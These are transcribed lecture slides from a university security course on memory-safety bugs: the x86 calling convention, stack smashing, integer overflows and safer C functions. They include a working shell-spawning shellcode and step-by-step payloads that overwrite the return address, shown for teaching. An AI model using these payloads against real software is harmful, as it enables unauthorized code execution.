1 of 94

Memory Safety Vulnerabilities

CS 161 Fall 2022 - Lecture 3

Computer Science 161

Fall 2022

Announcements

  • Homework 1 is due on Friday, September 9, 11:59 PM PT

Today: Memory Safety Vulnerabilities

  • Buffer overflows
    • Stack smashing
    • Memory-safe code
  • Integer memory safety vulnerabilities
  • Format string vulnerabilities
  • Heap vulnerabilities
  • Writing robust exploits

Review: x86 Calling Convention

Textbook Chapter 2.8 & 2.9

Review: Registers

  • EIP: instruction pointer, points to the next instruction to be executed
  • EBP: base pointer, points to top of the current stack frame
  • ESP: stack pointer, points to lowest item on the stack

Review: Instructions

  • push src
    • ESP moves one word down
    • Puts the value in src at the current ESP
  • pop dst
    • Copies the lowest value on the stack (where ESP is pointing) into dst
    • ESP moves one word up
  • mov src, dst
    • Copies the value in src into dst
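
The push and pop behavior above can be sketched as a toy model. This is only an illustration: the Stack class, its starting address, and the dict used as memory are assumptions made for the example, not part of x86.

```python
# Toy model of the x86 stack: memory is a dict from address to a 4-byte word.
WORD = 4  # bytes per word on 32-bit x86


class Stack:
    def __init__(self, esp=0xbffff000):  # the starting address is arbitrary
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= WORD            # ESP moves one word down
        self.mem[self.esp] = value  # the value is stored at the new ESP

    def pop(self):
        value = self.mem[self.esp]  # read the lowest value on the stack
        self.esp += WORD            # ESP moves one word up
        return value


s = Stack()
start = s.esp
s.push(2)
s.push(1)
first = s.pop()   # the most recently pushed value comes off first
second = s.pop()
```

Note that pop only moves ESP; the old value stays in memory until something overwrites it.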

Calling a Function in x86

[Figure: three panels, each showing the stack (with EBP and ESP) next to the code (caller code and callee code, with EIP). Before function call: the stack holds the caller frame. During function call: the stack holds the caller frame and the callee frame. After function call: the stack holds the caller frame again.]

Steps of an x86 Function Call

  1. Push arguments on the stack
  2. Push old EIP (RIP) on the stack
  3. Move EIP
  4. Push old EBP (SFP) on the stack
  5. Move EBP
  6. Move ESP
  7. Execute the function
  8. Move ESP
  9. Pop (restore) old EBP (SFP)
  10. Pop (restore) old EIP (RIP)
  11. Remove arguments from stack
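
The 11 steps can be traced with a small simulation. This is a sketch under stated assumptions: the Machine class, the starting address, and the strings standing in for code addresses are all made up for illustration; the call being modeled is callee(1, 2) with one 4-byte local, returning 42.

```python
WORD = 4  # bytes per word on 32-bit x86


class Machine:
    def __init__(self):
        self.esp = self.ebp = 0xbffff000  # arbitrary starting stack address
        self.eip = "caller"               # symbolic stand-in for a code address
        self.eax = 0
        self.mem = {}

    def push(self, value):
        self.esp -= WORD
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += WORD
        return value


m = Machine()
esp0, ebp0 = m.esp, m.ebp

m.push(2)                     # 1. push arguments, in reverse order
m.push(1)
m.push("caller+after_call")   # 2. push old EIP (the saved copy is the RIP)
m.eip = "callee"              # 3. move EIP to the callee
m.push(m.ebp)                 # 4. push old EBP (the saved copy is the SFP)
m.ebp = m.esp                 # 5. move EBP down to ESP
m.esp -= WORD                 # 6. move ESP down: space for one local
m.eax = 42                    # 7. execute the function (return value in EAX)
m.esp = m.ebp                 # 8. move ESP back up to EBP
m.ebp = m.pop()               # 9. restore old EBP from the SFP
m.eip = m.pop()               # 10. restore old EIP from the RIP
m.esp += 2 * WORD             # 11. remove the two arguments
```

After step 11, ESP and EBP hold the same values they had before the call.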

Steps 1 to 3 and step 11 run in the caller; steps 4 to 10 run in the callee.

x86 Function Call

Here is a snippet of C code:

int callee(int a, int b) {
    int local;
    return 42;
}

void caller(void) {
    callee(1, 2);
}

Here is the code compiled into x86 assembly:

caller:
    ...
    push $2
    push $1
    call callee
    add $8, %esp
    ...

callee:
    push %ebp
    mov %esp, %ebp
    sub $4, %esp
    mov $42, %eax
    mov %ebp, %esp
    pop %ebp
    ret

On the original slides, the instruction that was just executed is shown in red.

The EIP points to the address of the next instruction!

In the stack diagrams that follow, each row represents 4 bytes (32 bits).

  • The EBP and ESP registers point to the top and bottom of the current stack frame.

Stack (higher addresses first): caller stack frame

1. Push arguments on the stack

  • The push instruction decrements the ESP to make space on the stack
  • Arguments are pushed in reverse order

Stack after push $2 (higher addresses first): caller stack frame, 2

Stack after push $1 (higher addresses first): caller stack frame, 2, 1

2. Push old EIP (RIP) on the stack
3. Move EIP

  • The call instruction does 2 things
  • First, it pushes the current value of EIP (the address of the next instruction in caller) on the stack.
  • The saved EIP value on the stack is called the RIP (return instruction pointer).
  • Second, it changes EIP to point to the instructions of the callee.

Stack after call callee (higher addresses first): caller stack frame, 2, 1, Return Instruction Pointer

  • The next 3 steps (push %ebp, mov %esp, %ebp, and sub $4, %esp) set up a stack frame for the callee function.
  • These instructions are sometimes called the function prologue, because they appear at the start of every function.

4. Push old EBP (SFP) on the stack

  • We need to restore the value of the EBP when returning, so we push the current value of the EBP on the stack.
  • The saved value of the EBP on the stack is called the saved frame pointer (SFP).

Stack after push %ebp (higher addresses first): caller stack frame, 2, 1, Return Instruction Pointer, Saved Frame Pointer

5. Move EBP

  • This instruction (mov %esp, %ebp) moves the EBP down to where the ESP is located.

6. Move ESP

  • This instruction (sub $4, %esp) moves the ESP down to create space for the callee’s stack frame: here, 4 bytes for local.

7. Execute the function

  • Now that the stack frame is set up, the function can begin executing.
  • This function just returns 42, so we put 42 in the EAX register. (Recall the return value is placed in EAX.)

Stack (higher addresses first): caller stack frame, 2, 1, Return Instruction Pointer, Saved Frame Pointer, local

  • The next 3 steps (mov %ebp, %esp, pop %ebp, and ret) restore the caller’s stack frame.
  • These instructions are sometimes called the function epilogue, because they appear at the end of every function.

8. Move ESP

  • This instruction (mov %ebp, %esp) moves the ESP up to where the EBP is located.
  • This effectively deletes the space allocated for the callee stack frame.

9. Pop (restore) old EBP (SFP)

  • The pop instruction puts the SFP (saved EBP) back in EBP.
  • It also increments ESP to delete the popped SFP from the stack.

10. Pop (restore) old EIP (RIP)

  • The ret instruction pops the RIP off the stack into EIP, so execution continues in the caller at the instruction after call.

11. Remove arguments from stack

  • Back in the caller, we increment ESP (add $8, %esp) to delete the arguments from the stack.
  • The stack has returned to its original state before the function call!

Buffer Overflow Vulnerabilities

Textbook Chapter 3.1

Consider an Airport “Terminal”…

#293 HRE-THR 850 1930

ALICE SMITH


ECONOMY

SPECIAL INSTRUX: NONE


#293 HRE-THR 850 1930

ALICE SMITH
HHHHHHHHHH

HHONOMY

SPECIAL INSTRUX: NONE


How could Alice exploit this?

#293 HRE-THR 850 1930

ALICE SMITH


FIRST

SPECIAL INSTRUX: NONE


By inserting padding characters (spaces) and exploiting the lack of boundaries between lines, Alice now appears to be in first class!

Takeaway: Attackers can exploit lack of boundaries to control areas (memory, as we will see shortly) that they aren’t supposed to control

Buffer Overflow Vulnerabilities

  • Recall: C has no concept of array length; it just sees a sequence of bytes
  • If you allow an attacker to start writing at a location and don’t define when they must stop, they can overwrite other parts of memory!

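char name[4];
name[5] = 'a';

Memory diagram (lowest address first): name[0], name[1], name[2], name[3], one byte past the array, name[5] = 'a'

This code compiles, because C doesn’t check array bounds, but the write lands in memory past the end of name (undefined behavior).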

Vulnerable Code

char name[20];

void vulnerable(void) {
    ...
    gets(name);
    ...
}

The gets function keeps writing bytes until it reads a newline ('\n') in the input. It does not stop when the end of the array is reached!

Okay, but there’s nothing to overwrite, for now…

char name[20];
char instrux[20] = "none";

void vulnerable(void) {
    ...
    gets(name);
    ...
}

What does the memory diagram of static data look like now?

Memory diagram of static data (higher addresses first): ..., instrux (20 bytes), name (20 bytes)

gets starts writing at the bottom of name and can overwrite anything above name!

Note: name and instrux are declared in static memory (outside of the stack), which is why name is below instrux.

What can go wrong here?

char name[20];
int authenticated = 0;

void vulnerable(void) {
    ...
    gets(name);
    ...
}

Memory diagram (higher addresses first): ..., authenticated, name (20 bytes)

gets starts writing at the bottom of name and can overwrite the authenticated flag!

What can go wrong here?
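
One way to see what goes wrong is to model memory as a byte array. The sketch below assumes that authenticated sits directly above name with no padding, as the diagram suggests; unsafe_gets is a hypothetical stand-in for the C gets function, not a real API.

```python
import struct

# Hypothetical layout: 20 bytes of name immediately followed by a 4-byte int.
NAME_OFF, NAME_LEN = 0, 20
AUTH_OFF = NAME_OFF + NAME_LEN
memory = bytearray(NAME_LEN + 4)  # name is all zeros, authenticated == 0


def unsafe_gets(mem, offset, data):
    """Model of gets: copy up to the first newline, add a null byte, no bounds check."""
    line = data.split(b"\n", 1)[0] + b"\x00"
    mem[offset:offset + len(line)] = line


def authenticated(mem):
    """Read the little-endian int stored right above name."""
    return struct.unpack_from("<i", mem, AUTH_OFF)[0]


before = authenticated(memory)
# 20 bytes fill name; the 21st byte lands in the lowest byte of authenticated.
unsafe_gets(memory, NAME_OFF, b"A" * 20 + b"\x01\n")
after = authenticated(memory)
```

A 21-byte input is enough to flip the flag from 0 to a nonzero value.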

char line[512];
char command[] = "/usr/bin/ls";

int main(void) {
    ...
    gets(line);
    ...
    execv(command, ...);
}

Memory diagram (higher addresses first): ..., command, line (512 bytes)

What can go wrong here?

char name[20];
int (*fnptr)(void);

void vulnerable(void) {
    ...
    gets(name);
    ...
    fnptr();
}

Memory diagram (higher addresses first): ..., fnptr, name (20 bytes)

What can go wrong here?

fnptr is called as a function, so the EIP jumps to an address of our choosing!

Top 25 Most Dangerous Software Weaknesses (2020)

Rank  Score  Name
[1]   46.82  Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[2]   46.17  Out-of-bounds Write
[3]   33.47  Improper Input Validation
[4]   26.50  Out-of-bounds Read
[5]   23.73  Improper Restriction of Operations within the Bounds of a Memory Buffer
[6]   20.69  Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[7]   19.16  Exposure of Sensitive Information to an Unauthorized Actor
[8]   18.87  Use After Free
[9]   17.29  Cross-Site Request Forgery (CSRF)
[10]  16.44  Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[11]  15.81  Integer Overflow or Wraparound
[12]  13.67  Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[13]   8.35  NULL Pointer Dereference
[14]   8.17  Improper Authentication
[15]   7.38  Unrestricted Upload of File with Dangerous Type
[16]   6.95  Incorrect Permission Assignment for Critical Resource
[17]   6.53  Improper Control of Generation of Code ('Code Injection')

Stack Smashing

Textbook Chapter 3.2

Stack Smashing

  • The most common kind of buffer overflow
  • Occurs on stack memory
  • Recall: What are some values on the stack an attacker can overwrite?
    • Local variables
    • Function arguments
    • Saved frame pointer (SFP)
    • Return instruction pointer (RIP)
  • Recall: When returning from a function, the EIP is set to the value of the RIP saved on the stack in memory
    • Like the function pointer, this lets the attacker choose an address to jump (return) to!

Note: Python Syntax

  • For this class, you will see Python syntax used to represent sequences of bytes
    • This syntax will be used in Project 1 and on exams!
  • Adding strings: Concatenation
    • 'abc' + 'def' == 'abcdef'
  • Multiplying strings: Repeated concatenation
    • 'a' * 5 == 'aaaaa'
    • 'cs161' * 3 == 'cs161cs161cs161'

  • Raw bytes
    • len('\xff') == 1
  • Characters can be represented as bytes too
    • '\x41' == 'A'
    • ASCII representation: All characters are bytes, but not all bytes are characters
  • Note for the project: '\\' is a literal backslash character
    • len('\\xff') == 4, because the backslash is escaped first
      • This is a literal backslash character, a literal 'x' character, and 2 literal 'f' characters
      • '\\xff' == '\x5c\x78\x66\x66'
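
The identities above can be checked directly. A small sketch, assuming Python 3, where raw bytes are usually written as bytes literals (b'...') rather than plain strings; the variable names are just for illustration.

```python
# Python 3 bytes literals (b'...') mirror the slide notation for raw bytes.
joined = b'abc' + b'def'   # concatenation
padding = b'A' * 5         # repeated concatenation
one_byte = b'\xff'         # a single byte with value 0xff
letter = b'\x41'           # the byte 0x41 is the ASCII character 'A'
escaped = b'\\xff'         # backslash, 'x', 'f', 'f': four separate bytes
```

The last line is the easy one to get wrong: doubling the backslash turns one raw byte into four printable characters.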

Overwriting the RIP

void vulnerable(void) {
    char name[20];
    gets(name);
}

Stack diagram (higher addresses first): ..., RIP of vulnerable, SFP of vulnerable, name (20 bytes)

gets starts writing at the bottom of name and can overwrite anything above name, including the RIP!

Assume that the attacker wants to execute instructions at address 0xdeadbeef.

What should an attacker supply as input to the gets function? What value should the attacker write in memory? Where should the value be written?

  • Input: 'A' * 24 + '\xef\xbe\xad\xde'
    • 24 garbage bytes to overwrite all of name and the SFP of vulnerable
    • The address of the instructions we want to execute
      • Remember: Addresses are little-endian!
  • What if we want to execute instructions that aren’t in memory?
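
The input above can be built programmatically. A minimal sketch, assuming name is 20 bytes with the 4-byte SFP directly above it (as in the diagram); the constant names are illustrative only.

```python
import struct

BUF_LEN = 20          # sizeof(name)
SFP_LEN = 4           # the saved frame pointer sits between name and the RIP
target = 0xdeadbeef   # address the attacker wants to jump to

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
payload = b'A' * (BUF_LEN + SFP_LEN) + struct.pack('<I', target)
```

Using struct.pack avoids reversing the address bytes by hand.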

Note the NULL byte that terminates the string, automatically added by gets!

Stack after gets writes the input (higher addresses first; bytes in each row listed lowest address first):

    ...     '\x00'  ...     ...     ...
    RIP     '\xef'  '\xbe'  '\xad'  '\xde'
    SFP     'A'     'A'     'A'     'A'
    name    'A' * 20

Writing Malicious Code

  • The most common way of executing malicious code is to place it in memory yourself
    • Recall: Machine code is made of bytes
  • Shellcode: Malicious code inserted by the attacker into memory, to be executed using a memory safety exploit
    • Called shellcode because it usually spawns a shell (terminal)
    • Could also delete files, run another program, etc.
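
Because machine code is just bytes, shellcode can be handled like any other byte string. The sketch below stores the 23 bytes listed on this slide and decodes the two pushed constants; reading them as the path "/bin//sh" for a Linux execve call is an interpretation of the listing, not something the slide states.

```python
import struct

# The 23 machine-code bytes from the slide, grouped one instruction per string.
shellcode = bytes.fromhex(
    "31c0" "50" "682f2f7368" "682f62696e"
    "89e3" "89c1" "89c2" "b00b" "cd80"
)

# The two pushed constants are ASCII text stored in little-endian order.
first_push = struct.pack('<I', 0x68732f2f)   # pushed first, ends up higher
second_push = struct.pack('<I', 0x6e69622f)  # pushed second, ends up lower
path = second_push + first_push              # bytes as laid out from ESP upward
```

This is why the constants look scrambled in the assembly: each 4-byte chunk of the string is written as a little-endian integer.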

Assembly:

    xor %eax, %eax
    push %eax
    push $0x68732f2f
    push $0x6e69622f
    mov %esp, %ebx
    mov %eax, %ecx
    mov %eax, %edx
    mov $0xb, %al
    int $0x80

The assembler turns this into machine code bytes:

    0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x89 0xc1 0x89 0xc2 0xb0 0x0b 0xcd 0x80

Putting Together an Attack

  1. Find a memory safety (e.g. buffer overflow) vulnerability
  2. Write malicious shellcode at a known memory address
  3. Overwrite the RIP with the address of the shellcode
    • Often, the shellcode can be written and the RIP can be overwritten in the same function call (e.g. gets), like in the previous example
  4. Return from the function
  5. Begin executing malicious shellcode

Constructing Exploits

void vulnerable(void) {
    char name[20];
    gets(name);
}

Let SHELLCODE be a 12-byte shellcode. Assume that the address of name is 0xbfffcd40.

    Address      Contents
    0xbfffcd5c   ...
    0xbfffcd58   RIP of vulnerable
    0xbfffcd54   SFP of vulnerable
    0xbfffcd50   name
    0xbfffcd4c   name
    0xbfffcd48   name
    0xbfffcd44   name
    0xbfffcd40   name

What should an attacker supply as input to the gets function? What values should the attacker write in memory? Where should the values be written?

  • Input: SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'
    • 12 bytes of shellcode
    • 12 garbage bytes to overwrite the rest of name and the SFP of vulnerable
    • The address of where we placed the shellcode
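
The input above generalizes to any position of the shellcode inside name. A hedged sketch: the payload helper and the 0xcc placeholder bytes are assumptions for illustration (they are not real shellcode), and the layout is the one assumed on the slide.

```python
import struct

NAME_ADDR = 0xbfffcd40     # address of name, as assumed on the slide
BUF_LEN, SFP_LEN = 20, 4
SHELLCODE = b'\xcc' * 12   # placeholder: 12 stand-in bytes, not real shellcode


def payload(pad_before):
    """Shellcode inside name, preceded by pad_before garbage bytes."""
    pad_after = BUF_LEN + SFP_LEN - pad_before - len(SHELLCODE)
    assert pad_after >= 0, "shellcode must fit below the RIP"
    rip = struct.pack('<I', NAME_ADDR + pad_before)  # little-endian address
    return b'A' * pad_before + SHELLCODE + b'A' * pad_after + rip


at_start = payload(0)    # shellcode at name, RIP = 0xbfffcd40
shifted = payload(12)    # shellcode at name + 12, RIP = 0xbfffcd4c
```

Moving the shellcode changes the address written into the RIP, but the total distance from name to the RIP (24 bytes) stays the same.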

Stack after gets writes the input (bytes in each row listed lowest address first):

    Address      Contents
    0xbfffcd5c   '\x00' ... ... ...
    0xbfffcd58   '\x40' '\xcd' '\xff' '\xbf'   (RIP)
    0xbfffcd54   'A' 'A' 'A' 'A'               (SFP)
    0xbfffcd50   'A' 'A' 'A' 'A'               (name)
    0xbfffcd4c   'A' 'A' 'A' 'A'               (name)
    0xbfffcd48   SHELLCODE                     (name)
    0xbfffcd44   SHELLCODE                     (name)
    0xbfffcd40   SHELLCODE                     (name)

  • Alternative: 'A' * 12 + SHELLCODE + '\x4c\xcd\xff\xbf'
    • The address changed! Why?
      • We placed our shellcode at a different address (name + 12)!

Stack after gets writes the input (bytes in each row listed lowest address first):

    Address      Contents
    0xbfffcd5c   '\x00' ... ... ...
    0xbfffcd58   '\x4c' '\xcd' '\xff' '\xbf'   (RIP)
    0xbfffcd54   SHELLCODE                     (SFP)
    0xbfffcd50   SHELLCODE                     (name)
    0xbfffcd4c   SHELLCODE                     (name)
    0xbfffcd48   'A' 'A' 'A' 'A'               (name)
    0xbfffcd44   'A' 'A' 'A' 'A'               (name)
    0xbfffcd40   'A' 'A' 'A' 'A'               (name)

What if the shellcode is too large? Now let SHELLCODE be a 28-byte shellcode. What should the attacker input?

  • Solution: Place the shellcode after the RIP!
    • This works because gets lets us write as many bytes as we want
    • What should the address be?
  • Input: 'A' * 24 + '\x5c\xcd\xff\xbf' + SHELLCODE
    • 24 bytes of garbage
    • The address of where we placed the shellcode
    • 28 bytes of shellcode
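
The address in this input is simply the first byte after the RIP. A minimal sketch under the slide's layout assumptions; the 0xcc bytes are placeholders standing in for a 28-byte shellcode.

```python
import struct

NAME_ADDR = 0xbfffcd40            # address of name, as assumed on the slide
BUF_LEN, SFP_LEN, RIP_LEN = 20, 4, 4
SHELLCODE = b'\xcc' * 28          # placeholder: 28 stand-in bytes

# The shellcode starts at the first byte after the RIP.
shellcode_addr = NAME_ADDR + BUF_LEN + SFP_LEN + RIP_LEN
payload = (
    b'A' * (BUF_LEN + SFP_LEN)            # garbage over name and the SFP
    + struct.pack('<I', shellcode_addr)   # new RIP, little-endian
    + SHELLCODE                           # lands above the RIP
)
```

Since gets never stops at the end of name, the payload can be as long as the shellcode requires.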

Stack after gets writes the input (bytes in each row listed lowest address first):

    Address                   Contents
    0xbfffcd78                '\x00' ... ... ...
    0xbfffcd5c - 0xbfffcd74   SHELLCODE (28 bytes)
    0xbfffcd58                '\x5c' '\xcd' '\xff' '\xbf'   (RIP)
    0xbfffcd54                'A' 'A' 'A' 'A'               (SFP)
    0xbfffcd40 - 0xbfffcd50   'A' * 20                      (name)

Walking Through a Buffer Overflow

void vulnerable(void) {
    char name[20];
    gets(name);
}

int main(void) {
    vulnerable();
    return 0;
}

vulnerable:
    ...
    call gets
    addl $4, %esp
    movl %ebp, %esp
    popl %ebp
    ret

main:
    ...
    call vulnerable
    ...

Input: SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Stack before gets writes anything (higher addresses first): ..., RIP of vulnerable, SFP of vulnerable, name (20 bytes), ...

gets writes the input into memory starting at the lowest address of name and moving up. The slides show this one 4-byte row at a time:

  • The first 12 bytes written are SHELLCODE, filling the lowest 3 rows of name.
  • The next 8 bytes written are 'AAAA' twice, filling the remaining 2 rows of name.

We overwrite the SFP (saved EBP) with 'AAAA', so the SFP now holds the (probably invalid) address 0x41414141 ('AAAA').

We overwrite the RIP (saved EIP) with the address of our shellcode, 0xbfffcd40, so the RIP is now pointing at our shellcode! Remember, this value will be restored to EIP (the instruction pointer) later. gets also writes the terminating '\x00' just above the RIP.

Stack after gets has written the whole input (higher addresses first):

    ...      '\x00' in the lowest byte of this row
    (RIP)    0xbfffcd40
    (SFP)    'AAAA'
    (name)   'AAAA'
    (name)   'AAAA'
    (name)   SHELLCODE
    (name)   SHELLCODE
    (name)   SHELLCODE
    ...

Returning from gets: addl $4, %esp moves ESP up by 4, removing the argument to gets from the stack.

Function epilogue: movl %ebp, %esp moves ESP to EBP.

Function epilogue: popl %ebp restores the SFP into EBP. We overwrote the SFP with 'AAAA', so the EBP now holds the address 0x41414141. We don’t really care about EBP, though.

Function epilogue: ret restores the RIP into EIP. We overwrote the RIP with the address of our shellcode, so the EIP (instruction pointer) now points to our shellcode!

The shellcode runs, and the attacker gets a shell:

sh # _
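
The epilogue of vulnerable can be replayed on the overwritten stack. This is a sketch under the walkthrough's assumptions (name at 0xbfffcd40, EBP pointing at the SFP directly above name); word_at is a helper invented for the example and the 0xcc bytes are placeholders for the shellcode.

```python
import struct

NAME_ADDR = 0xbfffcd40     # address of name, as assumed in the walkthrough
SHELLCODE = b'\xcc' * 12   # placeholder bytes standing in for the shellcode
data = SHELLCODE + b'A' * 12 + struct.pack('<I', NAME_ADDR)

# Stack memory from name upward, after gets wrote the input plus a null byte.
mem = bytearray(data + b'\x00')


def word_at(addr):
    """Read the little-endian 32-bit word stored at a stack address."""
    return struct.unpack_from('<I', mem, addr - NAME_ADDR)[0]


ebp = NAME_ADDR + 20   # inside vulnerable, EBP points at the SFP
esp = ebp              # movl %ebp, %esp
ebp = word_at(esp)     # popl %ebp: EBP receives the overwritten SFP
esp += 4
eip = word_at(esp)     # ret: EIP receives the overwritten RIP
esp += 4
```

After ret, EIP equals the address of name, where the shellcode bytes now live.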

Memory-Safe Code

Still Vulnerable Code?

void vulnerable(void) {
    char *name = malloc(20);
    ...
    gets(name);
    ...
}

Yes: buffers on the heap can be overflowed too!

Solution: Specify the Size

void safe(void) {
    char name[20];
    ...
    fgets(name, 20, stdin);
    ...
}

The length parameter specifies the size of the buffer, and fgets won’t write more bytes than that (including the null terminator), so this call can’t overflow name!

Warning: Different functions take slightly different parameters

void safer(void) {
    char name[20];
    ...
    fgets(name, sizeof(name), stdin);
    ...
}

sizeof returns the size of the variable in bytes. This does not work for pointers: sizeof a pointer is the size of the pointer itself, not of the buffer it points to.

69 of 94

Vulnerable C Library Functions

  • gets - Read a string from stdin
    • Use fgets instead
  • strcpy - Copy a string
    • Use strncpy (more compatible, less safe) or strlcpy (less compatible, more safe) instead
  • strlen - Get the length of a string
    • Use strnlen instead (or memchr if you really need compatible code)
  • … and more (look up C functions before you use them!)
    • man pages are your friend!
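
One reason strncpy is labeled "less safe" above: it does not add a null terminator when the source fills the whole destination. A minimal sketch of a wrapper that always terminates follows. The name copy_string and its return convention are assumptions for illustration, and src is assumed to be a valid null-terminated string.

```c
#include <stddef.h>
#include <string.h>

/* Copies src into dst, truncating if needed, and always null-terminates.
 * Returns 0 if the whole string fit, -1 if it was truncated
 * or if dst_size is 0. */
int copy_string(char *dst, size_t dst_size, const char *src) {
    if (dst_size == 0) {
        return -1;
    }
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0'; /* strncpy alone may leave dst unterminated */
    return strlen(src) < dst_size ? 0 : -1;
}
```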

70 of 94

Short Break?

71 of 94

Integer Memory Safety Vulnerabilities

Textbook Chapter 3.4

72 of 94

Signed/Unsigned Vulnerabilities

void func(int len, char *data) {

char buf[64];

if (len > 64)

return;

memcpy(buf, data, len);

}

void *memcpy(void *dest, const void *src, size_t n);

Is this safe?

int is a signed type, but size_t is an unsigned type. What happens if len == -1?

The check is a signed comparison, so len > 64 is false. But memcpy takes a size_t, and converting -1 to an unsigned 32-bit type yields 0xffffffff: another buffer overflow!

73 of 94

Signed/Unsigned Vulnerabilities

void safe(size_t len, char *data) {

char buf[64];

if (len > 64)

return;

memcpy(buf, data, len);

}

Now this is an unsigned comparison, and no casting is necessary!
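
The two length checks can be compared side by side in a small sketch. The helper names below are hypothetical; they isolate the comparison and the implicit conversion that happens when a signed length is handed to memcpy.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define BUF_SIZE 64

/* The check from the vulnerable version: a signed comparison. */
bool signed_check_passes(int len) {
    return !(len > BUF_SIZE);
}

/* The check from the safe version: an unsigned comparison. */
bool unsigned_check_passes(size_t len) {
    return !(len > BUF_SIZE);
}

/* The value memcpy receives as n when given a signed length:
 * -1 converts to SIZE_MAX (0xffffffff with a 32-bit size_t). */
size_t as_memcpy_length(int len) {
    return (size_t)len;
}
```

A length of -1 passes the signed check but becomes the largest possible size_t, which the unsigned check rejects.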

74 of 94

Integer Overflow Vulnerabilities

void func(size_t len, char *data) {

char *buf = malloc(len + 2);

if (!buf)

return;

memcpy(buf, data, len);

buf[len] = '\n';

buf[len + 1] = '\0';

}

Is this safe?

What happens if len == 0xffffffff?

With a 32-bit size_t, len + 2 wraps around to 1, so malloc returns a 1-byte buffer and memcpy then overflows the heap!
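
The wraparound can be checked with a small sketch that models a 32-bit size_t using uint32_t. The function name alloc_size_32 is hypothetical.

```c
#include <stdint.h>

/* Models the expression len + 2 with a 32-bit size_t.
 * Unsigned arithmetic wraps modulo 2^32 instead of failing. */
uint32_t alloc_size_32(uint32_t len) {
    return (uint32_t)(len + 2u);
}
```

For len == 0xffffffff this returns 1, which is the allocation size malloc would see.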

75 of 94

Integer Overflow Vulnerabilities

void safe(size_t len, char *data) {

if (len > SIZE_MAX - 2)

return;

char *buf = malloc(len + 2);

if (!buf)

return;

memcpy(buf, data, len);

buf[len] = '\n';

buf[len + 1] = '\0';

}

It’s clunky, but you need to check bounds whenever you add to integers!
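
To make the bounds check less clunky, it can be factored into a helper. This is a sketch under the assumption that a small utility function is acceptable in the codebase; the name checked_add_size is hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Stores a + b in *out and returns true,
 * or returns false (leaving *out untouched) if the sum would wrap. */
bool checked_add_size(size_t a, size_t b, size_t *out) {
    if (a > SIZE_MAX - b) {
        return false;
    }
    *out = a + b;
    return true;
}
```

The safe function above could then call checked_add_size(len, 2, &total) and return early when it reports failure.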

76 of 94

Integer Overflows in the Wild

WJXT Jacksonville

Broward Vote-Counting Blunder Changes Amendment Result

November 4, 2004

The Broward County Elections Department has egg on its face today after a computer glitch misreported a key amendment race, according to WPLG-TV in Miami.

Amendment 4, which would allow Miami-Dade and Broward counties to hold a future election to decide if slot machines should be allowed at racetracks, was thought to be tied. But now that a computer glitch for machines counting absentee ballots has been exposed, it turns out the amendment passed.

"The software is not geared to count more than 32,000 votes in a precinct. So what happens when it gets to 32,000 is the software starts counting backward," said Broward County Mayor Ilene Lieberman.

That means that Amendment 4 passed in Broward County by more than 240,000 votes rather than the 166,000-vote margin reported Wednesday night. That increase changes the overall statewide results in what had been a neck-and-neck race, one for which recounts had been going on today. But with news of Broward's error, it's clear amendment 4 passed.

77 of 94

Integer Overflows in the Wild

  • 32,000 votes is very close to 32,768, or 2^15 (the article probably rounded)
    • Recall: The maximum value of a signed, 16-bit integer is 2^15 - 1
    • This means that an integer overflow would cause -32,768 votes to be counted!
  • Takeaway: Check the limits of data types used, and choose the right data type for the job
    • If writing software, consider the largest possible use case.
      • 32 bits might be enough for Broward County but isn’t enough for everyone on Earth!
      • 64 bits, however, would be plenty.
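
The takeaway can be sketched as a counter that refuses to wrap. This is an illustration only, not the voting software's actual code: the function names are hypothetical, and the 16-bit version exists to show where the limit sits.

```c
#include <stdbool.h>
#include <stdint.h>

/* Adds one vote to a 16-bit counter. Returns false, leaving the counter
 * unchanged, once it has reached INT16_MAX (2^15 - 1 = 32,767). */
bool add_vote_16(int16_t *count) {
    if (*count == INT16_MAX) {
        return false;
    }
    *count = (int16_t)(*count + 1);
    return true;
}

/* The same check with a 64-bit counter, whose limit is far beyond
 * any realistic number of votes. */
bool add_vote_64(int64_t *count) {
    if (*count == INT64_MAX) {
        return false;
    }
    *count += 1;
    return true;
}
```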

78 of 94

Another Integer Overflow in the Wild

9 to 5 Linux

New Linux Kernel Vulnerability Patched in All Supported Ubuntu Systems, Update Now

Marius Nestor

January 19, 2022

Discovered by William Liu and Jamie Hill-Daniel, the new security flaw (CVE-2022-0185) is an integer underflow vulnerability found in Linux kernel’s file system context functionality, which could allow an attacker to crash the system or run programs as an administrator.

79 of 94

How Does This Vulnerability Work?

  • The entire kernel (operating system) patch:
- if (len > PAGE_SIZE - 2 - size)
+ if (size + len + 2 > PAGE_SIZE)
  return invalf(fc, "VFS: Legacy: Cumulative options too large");
  • Why is this a problem?
    • PAGE_SIZE and size are unsigned
    • If size is larger than PAGE_SIZE - 2
    • …then PAGE_SIZE - 2 - size wraps around to a huge unsigned value (such as 0xFFFFFFFF) instead of going negative
  • Result: An attacker can bypass the length check and write past the end of a kernel buffer
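
The old and new checks can be compared in user space. The sketch below assumes a 4096-byte page and uses size_t for both values; the function names and the PAGE_SIZE_ASSUMED constant are hypothetical and are not kernel identifiers.

```c
#include <stdbool.h>
#include <stddef.h>

#define PAGE_SIZE_ASSUMED ((size_t)4096) /* assumption: 4 KiB pages */

/* Pre-patch check: true means "too large, reject".
 * The subtraction wraps when size > PAGE_SIZE_ASSUMED - 2. */
bool old_check_rejects(size_t size, size_t len) {
    return len > PAGE_SIZE_ASSUMED - 2 - size;
}

/* Patched check: the same condition rearranged into an addition,
 * so nothing is subtracted from an unsigned value. */
bool new_check_rejects(size_t size, size_t len) {
    return size + len + 2 > PAGE_SIZE_ASSUMED;
}
```

With size == 4095 and len == 100, the old check accepts the request while the patched check rejects it. The patched form still assumes size and len are small enough that their sum cannot itself wrap.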

80 of 94

Format String Vulnerabilities

Textbook Chapter 3.3

81 of 94

